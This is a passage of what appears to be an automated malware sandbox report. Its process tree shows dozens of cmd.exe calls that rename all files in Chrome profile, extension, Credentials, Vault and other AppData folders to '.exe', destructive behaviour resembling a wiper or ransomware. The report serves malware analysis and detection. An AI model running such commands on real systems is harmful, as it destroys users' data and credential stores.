        
        PID:3448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\*.*" "*.exe"
        6⤵
        
        PID:3292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\*.*" "*.exe"
        6⤵
        
        PID:3224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\*.*" "*.exe"
        6⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\*.*" "*.exe"
        6⤵
        
        PID:2456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\*.*" "*.exe"
        6⤵
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\*.*" "*.exe"
        6⤵
        
        PID:4648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\*.*" "*.exe"
        6⤵
        
        PID:3916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\*.*" "*.exe"
        6⤵
        
        PID:3652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\*.*" "*.exe"
        6⤵
        
        PID:3108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\*.*" "*.exe"
        6⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\*.*" "*.exe"
        6⤵
        
        PID:3992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\*.*" "*.exe"
        6⤵
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\*.*" "*.exe"
        6⤵
        
        PID:2092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\*.*" "*.exe"
        6⤵
        
        PID:4704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\*.*" "*.exe"
        6⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\*.*" "*.exe"
        6⤵
        
        PID:4856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\*.*" "*.exe"
        6⤵
        
        PID:1124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\*.*" "*.exe"
        6⤵
        
        PID:2684
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\*.*" "*.exe"
        6⤵
        
        PID:4168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\*.*" "*.exe"
        6⤵
        
        PID:4720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\*.*" "*.exe"
        6⤵
        
        PID:1772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\*.*" "*.exe"
        6⤵
        
        PID:660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\*.*" "*.exe"
        6⤵
        
        PID:3832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\*.*" "*.exe"
        6⤵
        
        PID:1616
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\*.*" "*.exe"
        6⤵
        
        PID:3996
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\*.*" "*.exe"
        6⤵
        
        PID:1300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"
        6⤵
        
        PID:2456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*.*" "*.exe"
        6⤵
        
        PID:5108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"
        6⤵
        
        PID:4368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2028
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
        6⤵
        
        PID:844
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*.*" "*.exe"
        6⤵
        
        PID:4720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*.*" "*.exe"
        6⤵
        
        PID:3652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*.*" "*.exe"
        6⤵
        
        PID:3680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\*.*" "*.exe"
        6⤵
        
        PID:3236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\*.*" "*.exe"
        6⤵
        
        PID:2732
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\*.*" "*.exe"
        6⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\*.*" "*.exe"
        6⤵
        
        PID:4648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir\*.*" "*.exe"
        6⤵
        
        PID:900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"
        6⤵
        
        PID:1124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\*.*" "*.exe"
        6⤵
        
        PID:1796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"
        6⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\*.*" "*.exe"
        6⤵
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\*.*" "*.exe"
        6⤵
        
        PID:3452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\*.*" "*.exe"
        6⤵
        
        PID:2168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\*.*" "*.exe"
        6⤵
        
        PID:5084
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\*.*" "*.exe"
        6⤵
        
        PID:1384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\*.*" "*.exe"
        6⤵
        
        PID:764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\*.*" "*.exe"
        6⤵
        
        PID:3852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\*.*" "*.exe"
        6⤵
        
        PID:1580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\*.*" "*.exe"
        6⤵
        
        PID:4740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\*.*" "*.exe"
        6⤵
        
        PID:1528
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\*.*" "*.exe"
        6⤵
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\*.*" "*.exe"
        6⤵
        
        PID:1576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\*.*" "*.exe"
        6⤵
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\cache\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\cache\index-dir\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
        6⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\*.*" "*.exe"
        6⤵
        
        PID:4128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\*.*" "*.exe"
        6⤵
        
        PID:900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\*.*" "*.exe"
        6⤵
        
        PID:224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\*.*" "*.exe"
        6⤵
        
        PID:3344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\*.*" "*.exe"
        6⤵
        
        PID:2740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\*.*" "*.exe"
        6⤵
        
        PID:1408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\*.*" "*.exe"
        6⤵
        
        PID:3044
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\*.*" "*.exe"
        6⤵
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\*.*" "*.exe"
        6⤵
        
        PID:4704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\*.*" "*.exe"
        6⤵
        
        PID:3056
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\*.*" "*.exe"
        6⤵
        
        PID:3336
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\*.*" "*.exe"
        6⤵
        
        PID:1768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\*.*" "*.exe"
        6⤵
        
        PID:5032
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\*.*" "*.exe"
        6⤵
        
        PID:2468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\*.*" "*.exe"
        6⤵
        
        PID:2604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\*.*" "*.exe"
        6⤵
        
        PID:3916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\*.*" "*.exe"
        6⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\*.*" "*.exe"
        6⤵
        
        PID:1152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\*.*" "*.exe"
        6⤵
        
        PID:2956
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\*.*" "*.exe"
        6⤵
        
        PID:740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\*.*" "*.exe"
        6⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\*.*" "*.exe"
        6⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\*.*" "*.exe"
        6⤵
        
        PID:3164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64\*.*" "*.exe"
        6⤵
        
        PID:3888
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\*.*" "*.exe"
        6⤵
        
        PID:1900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\*.*" "*.exe"
        6⤵
        
        PID:3916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Credentials\*.*" "*.exe"
        6⤵
        
        PID:1524
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\*.*" "*.exe"
        6⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\*.*" "*.exe"
        6⤵
        
        PID:2088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\*.*" "*.exe"
        6⤵
        
        PID:1468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\*.*" "*.exe"
        6⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\*.*" "*.exe"
        6⤵
        
        PID:5020
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\*.*" "*.exe"
        6⤵
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\*.*" "*.exe"
        6⤵
        
        PID:3412
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\*.*" "*.exe"
        6⤵
        
        PID:4580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\*.*" "*.exe"
        6⤵
        
        PID:4464
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\*.*" "*.exe"
        6⤵
        
        PID:2288
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\*.*" "*.exe"
        6⤵
        
        PID:3108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\*.*" "*.exe"
        6⤵
        
        PID:844
      - C:\Windows\System32\cmd.exe
        
